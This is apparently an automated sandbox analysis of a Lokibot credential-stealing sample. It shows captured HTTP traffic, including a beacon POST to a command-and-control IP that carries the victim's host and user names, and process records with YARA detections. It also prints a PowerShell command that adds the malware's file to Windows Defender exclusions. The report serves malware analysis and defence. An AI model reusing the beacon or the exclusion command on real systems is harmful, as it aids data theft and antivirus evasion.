                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:53.502182961 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:53.502221107 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:53.502300024 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:53.502338886 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:53.502376080 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:53.502412081 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:53.502450943 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:53.502489090 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:53.502527952 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination Port
                          80192.168.2.549794136.244.109.7580
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:53.924912930 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:54.136291027 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:55.068927050 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:54 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:55.068984985 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:55.069022894 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:55.069061041 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:55.069101095 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:55.069139004 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:55.069179058 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:55.069219112 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:55.069256067 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:55.069295883 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:03:16:46
                          Start date:17/04/2024
                          Path:C:\Users\user\Desktop\gunzipped.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\gunzipped.exe"
                          Imagebase:0x220000
                          File size:553'984 bytes
                          MD5 hash:8864B52D242037414B7C4A230C390AB8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:low
                          Has exited:true

                          Target ID:2
                          Start time:03:16:47
                          Start date:17/04/2024
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe"
                          Imagebase:0xf90000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:03:16:47
